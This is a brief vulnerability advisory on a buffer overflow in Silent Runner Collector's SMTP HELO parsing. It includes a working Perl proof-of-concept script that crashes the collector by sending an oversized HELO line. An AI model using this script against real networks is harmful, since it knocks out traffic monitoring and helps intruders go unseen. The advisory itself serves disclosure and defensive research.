COMMAND

    Silent Runner Collector

SYSTEMS AFFECTED

    Silent Runner Collector

PROBLEM

    Jack Hayes found following.   Silent Runner Collector (SRC) has  a
    buffer overflow condition in the routines that parse SMTP traffic.
    SRC  is  the  "sniffer"  conponent  of  the  Silent Runner network
    traffic analysis suite.   The overflow was  noticed in SRC  v1.6.1
    but  is  likely  present  in  other  versions as well.  The actual
    buffer  in  question   holds  the  SMTP  HELO  line.  The overflow
    occurs when  a HELO  command in  excess of  4096 bytes  transits a
    network  segment   that  the   collector  is   monitoring.    This
    vulnerability  can  be  exploited  by  an  intruder  to  crash the
    collector  and  thus  stop  the  monitoring  of transiting network
    traffic.  Not sure if this bug  can be exploited in such a way  as
    to allow for the execution of code on the sensor.

    #!/usr/bin/perl
    # This is a simple script that demonstrates the
    # SRC HELO overflow vulnerability.  It will result
    # in a crashed silent runner collector so please do
    # not use it on production networks.  It is intended
    # for demonstration purposes only.
    
    use IO::Socket;
    
    $remote_host = '192.168.111.3';
    $remote_port = 25;
    
    $buf = 'A' x 4092;
    
    $socket = IO::Socket::INET->new(PeerAddr => $remote_host,
    
    PeerPort => $remote_port,
    
    Proto    => "tcp",
    
    Type     => SOCK_STREAM)
    or die "Can't connect to $remote_host:$remote_port : $@\n";
    
    # 'HELO ' + $buf  = 4097 bytes ( 1 byte too much)
    print $socket "HELO $buf";
    
    exit;

SOLUTION

    Nothing yet.